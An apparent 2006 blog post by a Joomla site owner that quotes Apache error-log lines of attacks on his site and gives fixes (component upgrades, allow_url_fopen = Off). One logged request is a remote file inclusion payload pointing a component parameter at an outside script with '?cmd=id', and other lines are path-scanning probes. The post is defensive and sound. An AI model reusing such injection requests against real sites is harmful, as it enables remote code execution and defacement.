I've already tried to reduce the surface of attack of my homepage by removing all un-needed components, modules, mambots but here is below what I've found into the log files...

Hackers trying remote code injection

were  found more than one time in apache error.log

[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

Remember You should ASAP update the following components to their latest version:
  • com_securityimages < 3.0.5 use at least a version  > 3.0.6
  • com_hashcash < 1.2.1 use at least a version  > 1.2.2
  • com_bayesiannaivefilter has been developed but never release as a component, but it is still available at Joomla forge developer tree.
This attack is trying to execute a scripts, locate at http://recon.reschat.dk/images/gallery/tool25.txt. If You go there, You'll find that th script is readable and contains a header.
Defacing Tool 2.0 by xxxxxx
Defacing Tool 2.0 by xxxxxxx" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites.

Solutions:
  1. For com_bayesiannaivefilter sorry guys but I do not have this plugins nor it has ever been released in the wild. com_securityimages or com_hashcash, just Upgrade!
  2. If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable. /etc/php.ini  allow_url_fopen = Off
 Hackers trying to access well known PHP files

each lines below at least more than 500 times...in 1 day

[Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

Hacker trying to access  files that do not exist
  • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
  • wiki/administrator/
  • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
  • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
  • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php
which look like programs brute forcing with a set of rules some paths searching well known vulnerability

Some strange attempts...

[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com

comments powered by Disqus

You might like also

No Thumbnail was found
Joomla! Joomla! Extensions Showcase Joomla! Extension Forums Joomla! Extension Tickets Joomla! unnoficial mirror Joomla! WIKI Documentation WEB 2.0 Nas-at-home costs storage calculations Display structure of website based on their HTML tags Browse my sites using tags Browse my sites using mind map trees My CSS Sprite Generator online Scrum Planning Poker Timer Fun My name will land on Planet Mars! My name will orbit around Planet Pluto "Send Your Name to the Moon" Project Face in Space project Message to Bennu …
1611 Days ago
Merry Christmas to all my friends and visitors all around the world!
I would like to wish everyone a Merry Christmas / Joyeux Noel / Frohliche Weihnachten! …
2035 Days ago
No Thumbnail was found
Sometimes it is good to Google for your name, sometimes some funny stuff popup… www.waltercedric.com ranks 69382 out of 256 million domains on the web and has a Google PageRank of "7" . "utf-8 character encoding is being used on www.waltercedric.com and its textual language contains English and it is located in Germany, www.waltercedric.com is being sponsored by advertising networks such as google adsense, with an estimated monthly earnings of $1440 and an estimated worth of $5’809’581 with 852569 visitors …
2970 Days ago
My Bug tracking tool is now open to anonymous users
You do not have to register anymore to view issues and all my projects (all Google bots are now welcomed to crawl the site) But In order to better track issues, I still recommend you to create an account as soon as you want to ask or do something serious. Google will rapidly index the site and hopefully also all comments and workaround I will publish there. Please Do not hesitate to post any new features on every component wish …
3561 Days ago
Social ranking: a new way to estimate the social value of your site
Social ranking is crucial because it can be thought of as a measurement of your influence as far as social networks go. I found a site while Googling that try to measure this social value. it is always good to know where you are, and how you compare to others. &160; &160; &160; &160; BuildStats will provide you with free site information for your or a competitors' site, using multiple resources. The site information will highlight on page and off …
3591 Days ago
My résumé is up to date
I just update my résumé …
3645 Days ago
Showcase Joomla! site is up to date
You can see all my new extensions live running at http://demo2.waltercedric.com NOW …
3690 Days ago
I own cedric.walter on facebook
&160; I just reserve the name cedric.walter on facebook so starting from now, my profile can be reach at http://www.facebook.com/cedric.walter …
3691 Days ago
Pluton, Moon and firefox online
Don’t try to search any relationship with the 3 above words, I just found these files on my hard disk during a cleaning session and thought it may be good to put them online    http://pluton.waltercedric.com http://moon.waltercedric.com http://firefox.waltercedric.com …
3692 Days ago
Forums update to …… PHBB3
I decide to migrate to PHBB and went away from SMF! Don’t understand it wrongly, SMF was great for me in the last 3 years: stable, easy to use and not much targeted by hackers ;-) &160; &160; I leave SMF mainly as: There is no bridge available in Joomla! (bridge is discontinued and considered unsafe) I would like to unify login across all my sub domains in the near future. The idea is to let you log yourself only …
3766 Days ago